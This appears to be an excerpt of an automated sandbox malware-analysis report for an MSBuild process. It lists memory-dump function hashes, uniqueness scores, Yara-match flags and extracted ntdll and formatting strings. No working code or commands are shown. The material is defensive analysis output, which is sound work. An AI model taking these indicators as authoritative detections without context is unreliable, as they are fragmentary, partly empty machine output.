                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8de1b8fa7958aebc9838ae35d3d703efa4b4c678466c342d410ef8e269ee21d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA012170E0020ADFDB44DFA9D555B9EFBF4FF08304F14817AA919EB391E6349A418B90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a39d692eab624fd11b6a6c98b35a08ec265d661be432ae626ca2721dd6d6af4a
                                                                                                                                                                                                                                                                  • Instruction ID: 1fc2d3171e009da28175e993f981e62e21cb26c531688464a7263b82525d7543
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a39d692eab624fd11b6a6c98b35a08ec265d661be432ae626ca2721dd6d6af4a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AF0E270A10209AFDB04EFB8D951EAEB7F8FF14704F008459B901EB391EA34D900CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e34731dea1716ccddfe598d8aaf91cfba4fe6e2f1da1c4aacf453f6a6825b623
                                                                                                                                                                                                                                                                  • Instruction ID: 6b2c5b9eb78de5e81bb01a37c943e93b1da9d32851678b7a3792b7e9397bdf0a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e34731dea1716ccddfe598d8aaf91cfba4fe6e2f1da1c4aacf453f6a6825b623
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07F0E2716116919FE732971CC1C8F917BD89F807BCF0CB466DA46C7D12E264E980CA50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: bb919459d63772024e022e36bb6f86063908c06539f0944a2ae69ace6375ff0f
                                                                                                                                                                                                                                                                  • Instruction ID: 85d282bd96ae45768f408703bf2e39917b1877000da927f6aaa8237e19633596
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb919459d63772024e022e36bb6f86063908c06539f0944a2ae69ace6375ff0f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93F082B0A10249ABDB04EBB8D955EAE77B8FF04708F040059B901EB2E1EA74E901CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                                                                                                                                                                  • Instruction ID: e055d838bfb28c0221337e37628e78756deae64e9e8ea9fe1e28c20b627b8999
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F0E53350461467C230AA5D8C05F5BFBACDBE5B74F10031ABA249B2D0DA70A901D7D6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 91bc6d2f4a7a7363e227d0fd912dbc8abbf0116d2eb4c18dc638472b5bcf4a19
                                                                                                                                                                                                                                                                  • Instruction ID: 4b2dd3da43421e1bfdbff7998e0a3384637551e782c02b0493396ac82cf53aff
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91bc6d2f4a7a7363e227d0fd912dbc8abbf0116d2eb4c18dc638472b5bcf4a19
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0A770A14249ABDF04DBBDD955EAE77F8EF19704F504059E902EB3E1EA74DD008714
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7f897501ab69f5bccdbcaa34f24b5975126ca917219eac003c8fa7594e9b256f
                                                                                                                                                                                                                                                                  • Instruction ID: dca04f55c9a3aefdc310fc45bfa09713b39cd19e7ff92904131c74500a81dee7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f897501ab69f5bccdbcaa34f24b5975126ca917219eac003c8fa7594e9b256f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F0EC71911685EFEB23E31ED098F2377D89B00A3CF098069DA0D8BE22D328C880C250
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: bc7fcf88d4d009bd4903ceb71aa74310aed755d540d9a4549ef407c84f4638a3
                                                                                                                                                                                                                                                                  • Instruction ID: 031d93e89d0e77ee6137ec94a2341d26b807cd4e75e31e2b80c7b945bcc2b173
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc7fcf88d4d009bd4903ceb71aa74310aed755d540d9a4549ef407c84f4638a3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7F08270A14249ABDB14EBB8D955EAE77B8EF14704F044059B901EF291EA74D901C754
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e3e7be0360bafd4c2623bc647befc81f4861bcc467a8ed67de8d2c04cae738db
                                                                                                                                                                                                                                                                  • Instruction ID: 1263f51fee36e15d7feeec1f5b373a218172d5cd30f534e8b4ee285dc4c5c444
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3e7be0360bafd4c2623bc647befc81f4861bcc467a8ed67de8d2c04cae738db
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E90023A60541802E150715C5414746001597D0305F55C051F0024654DC7559B5977A2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f2e818fe0a553aacc6e1986488edfb8f8411a5ec55dfe57c40c237ea81cea3e8
                                                                                                                                                                                                                                                                  • Instruction ID: fa4d48acd68cc906c0768cb4214ccad4f3c6056d33b82548ef66bc3a9d23bc25
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2e818fe0a553aacc6e1986488edfb8f8411a5ec55dfe57c40c237ea81cea3e8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E90023A20141802E104715C5804686001597D0305F55C051F6024655ED66599957232
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c45e9849438a07ecf0e91a8fcda7262ee536fcc3b8c1a7c7bf56755d13c480c8
                                                                                                                                                                                                                                                                  • Instruction ID: 46c468c52ad94d53bf984bdda36007d98d46c31b2e4874e802ab38fd5bca007c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c45e9849438a07ecf0e91a8fcda7262ee536fcc3b8c1a7c7bf56755d13c480c8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D490023A20545842E140715C5404A46002597D0309F55C051F0064694DD6259E59B762
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a988bf6b173ca540ba72a4d221819b278a05ef63e4fa7562a473026210e8d352
                                                                                                                                                                                                                                                                  • Instruction ID: faf923f8efae942dee8ab6d4a1462f5a4b464c26fb5585673b11fb3819ecbd49
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a988bf6b173ca540ba72a4d221819b278a05ef63e4fa7562a473026210e8d352
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB9002AA201550929500B25C9404B0A451597E0205B55C056F1054560CC52599559236
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 877706030e004b0f1f18c5a0353df06af1589ec9ce824915b72206059816329a
                                                                                                                                                                                                                                                                  • Instruction ID: e3b2fb32a08f214861c6625dc148ae80b11fe185c01cc5f9df4896630e22b620
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 877706030e004b0f1f18c5a0353df06af1589ec9ce824915b72206059816329a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5490022E221410025145B55C160450B0455A7D6355395C055F1416590CC62199695322
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b591d857f54885fa59d0c9865d691459d64f4be3045d1579a0861d238cfe96ac
                                                                                                                                                                                                                                                                  • Instruction ID: cf9a15adb5db45d7562a5b7daccf04298e5717b8cc649e0c063ef6b8d9177910
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b591d857f54885fa59d0c9865d691459d64f4be3045d1579a0861d238cfe96ac
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0490023A20241142E540725C6804A4E411597E1306B95D455F0015554CC91499655322
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4e2da8025f8c4e80e101ddea349d5ac104785d769e2c5c61e8cfa8d608787067
                                                                                                                                                                                                                                                                  • Instruction ID: 3b4383de30a95024e4aa7e69c990b7f2f615c772c34fbee95926b904e9554703
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e2da8025f8c4e80e101ddea349d5ac104785d769e2c5c61e8cfa8d608787067
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5990022A20545442E100755C6408A06001597D0209F55D051F1064595DC6359955A232
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 60be82a59c3bf5df3d97c90ceb8fa22dc6872af9ff48ebfef6edc446cf440045
                                                                                                                                                                                                                                                                  • Instruction ID: b720e8cc25154aa5215c99c9d30646ce91eebd3b7f4c260460ba12fef99e085d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60be82a59c3bf5df3d97c90ceb8fa22dc6872af9ff48ebfef6edc446cf440045
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3890026A20181403E140755C5804607001597D0306F55C051F2064555ECA299D556236
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                                  • Instruction ID: 59cc1895e2f20b9005340f141a00274db6a462db0acb6577aa28f9632b10889b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013F4655
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013F4725
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 013F4787
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013F46FC
                                                                                                                                                                                                                                                                  • Execute=1, xrefs: 013F4713
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013F4742
                                                                                                                                                                                                                                                                  • ExecuteOptions, xrefs: 013F46A0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                                                  Uniqueness

